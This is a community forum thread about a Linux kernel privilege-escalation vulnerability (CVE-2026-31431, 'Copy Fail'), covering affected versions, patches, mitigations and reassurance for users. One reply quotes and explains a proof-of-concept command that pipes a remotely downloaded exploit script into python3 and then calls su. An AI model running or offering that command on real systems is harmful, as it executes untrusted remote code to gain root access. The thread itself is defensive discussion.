Copy Fail - High Severity Vulnerability - CVE-2026-31431

Important notifications
1

Hi Everyone,

There is a new high severity linux vulnerabilty that was silently patched with a664bf3 last month.

For those of you that don’t update your systems often or haven’t in the past month you will likely want to update your kernel to ensure that you’ve successfully remediated. For those of you that are system admins with minimal patch windows you will want to prioritize this remediation.

POCs are now available for those of you that want to test if you are vulnerable. https://copy.fail/#affected

I tested on a vulnerable system and exploitation was just that easy.

image

Here’s a link to the original research for those of you that are curious. Its a very interesting read: https://xint.io/blog/copy-fail-linux-distributions

backlink:

4

People will need to update their kernel because of this once the security patch is available.

5

Not vulnerable. Yay :slight_smile:

6

Looks like this affects kernel versions from 4.14.1-1 until 6.19.12-1 according to https://security.archlinux.org/CVE-2026-31431 .

7

This was fixed in 6.19.12-1. If you have any version prior to this, update!

8

For those of you that can’t install patches RedHat has provided some mitigations that don’t require upgrading your kernel: https://access.redhat.com/security/cve/cve-2026-31431

9

What about the LTS version? I have 7.0.1 Arch, but 6.18.25 LTS.

10

image

am i vulnerable to the exploit? this is my kernel version at the moment, sorry if this is dumb to ask i’m kinda in a panic rn

11

Should be good @Sentry64 :+1:

The Arch Linux report for that CVE states that it was fixed with kernel 6.19.12-1.

image
image430×592 48.1 KB

So for anyone keeping a pretty up-to-date system, it’s actually been fixed for a couple of weeks now.

12

oh thank goodness, i was worried for a moment there..

thanks for the reply!

13


everyone should be fine if system is updated.

15

Tested on my machine and it looks to be patched on 6.18.25-1-lts

16

Thanks. A previous post mentioned 6.19.12-1 (without saying whether it was LTS or not) as the safe version, so I just wanted to make sure.

17

thank you all

18

19

I run 6.19.14-arch1-1 (64-bit) as KDE-System-Info says. What’s the proper command to get that info, please?

20

You should not run this on your system, also it should not harm and it should get reset with reboot.

  1. curl https://copy.fail/exp: This downloads a script from a remote server. You have no way of knowing what is in that script without inspecting it first.
  2. | python3: This takes the downloaded script and immediately executes it using the Python interpreter. This means the code runs with your current user permissions the moment it is downloaded.
  3. && su: If the previous script succeeds, it attempts to switch to the superuser (root) account. In the context of an exploit (like the CVE mentioned in the page title), the script likely attempts to steal your password or use a vulnerability to grant the attacker root access.

The website is mentioning the command:

screenshot2026-05-0122-06-28

I had run that on virtual machines, so you do not have too; )

21

Ah, okay. Thanks, Joe. As i have a Kernel above the fixed 6.19.12-1 I should be save. :wink: